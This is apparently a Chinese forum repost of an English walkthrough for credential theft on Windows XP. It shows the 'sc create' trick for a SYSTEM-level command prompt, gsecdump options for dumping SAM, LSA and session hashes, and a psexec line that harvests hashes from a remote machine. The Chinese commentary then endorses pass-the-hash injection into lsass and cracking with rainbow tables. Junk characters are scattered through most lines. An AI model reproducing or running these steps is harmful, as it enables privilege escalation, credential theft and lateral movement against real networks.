o get a DOS Prompt as NT system: H# E" ?; {$ b% h9 i' n3 g
; ~0 S2 D N; F
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact/ o7 b7 I ]) V; S/ p! g
[SC] CreateService SUCCESS( }8 Y5 x( H. M7 h( W% b: T
6 j' ~0 A6 u# g# C5 _' E( }# j+ dC:\>sc start shellcmdline
/ U, I4 e7 R& U: N! {5 D' _: R- A[SC] StartService FAILED 1053:
' w* ?- E( w/ {6 S0 Q8 Z
7 q! v$ e) {% a: kThe service did not respond to the start or control request in a timely fashion.
% Y4 {7 I# ]' O" D4 V0 m" _
2 w* X/ `) }( Y& g# K" mC:\>sc delete shellcmdline
$ ~7 s( d! N+ ~/ l' d2 J% u. N: z( e[SC] DeleteService SUCCESS
8 D0 V+ Y% F9 _' J; A* C0 H+ [, @7 G! ?) y& d
------------
- D. ^) Z* ~/ m5 n3 p( p5 n* [; q- q' @% a
Then in the new DOS window:. _" B4 _: T3 M9 N5 j' N
! i& F7 S- E8 {, k/ A# A
Microsoft Windows XP [Version 5.1.2600]
# Z0 c$ @" v% j' r6 t( }(C) Copyright 1985-2001 Microsoft Corp.+ j) z G' ?6 a% A- Y& i
6 j# ]* k# H9 g' Y! [ B3 a9 m
C:\WINDOWS\system32>whoami
/ X' e/ c( K$ `- UNT AUTHORITY\SYSTEM
8 V6 T c/ P8 ^) U3 ? r5 _* I4 g- e2 L
C:\WINDOWS\system32>gsecdump -h: p# V. O8 G ^
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
) j }6 J+ o8 G2 k2 J1 m. susage: gsecdump [options]
6 M9 I3 o7 \2 T% _
+ G1 X. D" t3 A2 Foptions:
8 g/ k7 g( q* W4 J4 S-h [ --help ] show help4 o- x# B4 C& G% \* p7 ?6 K
-a [ --dump_all ] dump all secrets3 s4 l$ s# `' x3 M! E5 L0 H
-l [ --dump_lsa ] dump lsa secrets
( ^" m: g* C. _* e5 G-w [ --dump_wireless ] dump microsoft wireless connections
5 g6 _" o6 d' G" l# n-u [ --dump_usedhashes ] dump hashes from active logon sessions, {! L# O4 @- }: n. F/ V
-s [ --dump_hashes ] dump hashes from SAM/AD1 }$ N: Y& c7 E0 ~, Q& ~' n
) B" k* a7 y5 g; P
Although I like to use:
6 z8 c# H: t J6 O |
/ @7 {( C6 u- m/ yPsExec v1.83 - Execute processes remotely& O, s; D2 }" q0 G
Copyright (C) 2001-2007 Mark Russinovich2 j! a- ]2 S- T
Sysinternals - 链接标记[url]www.sysinternals.com[/url]/ f9 t0 H! e# b4 |6 M) v6 J7 g
8 U: |, q/ o5 P) c+ R' @! [+ j* _
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT) g4 y6 X/ L( w( ^3 G; C" e
1 h- n. Z6 u$ c+ P0 s! Jto get the hashes from active logon sessions of a remote system.9 i& g4 q- H' b. d7 Q0 B
( F- U1 G( m! ~4 L% U
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
( I% l6 a$ [& K F' ]( g0 i8 ]0 B2 S
5 \$ e1 m- I$ w) T f提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.& t& @3 ~/ E$ g& j0 N2 m' U, X( I
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]9 B. {$ y% E# l, g) g4 F
; b5 m' T( c4 C2 \4 B1 I; e
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
8 N0 {; T% a' P2 U. O. f6 W |
发表于 2012-11-6 21:09:29
收藏
支持
反对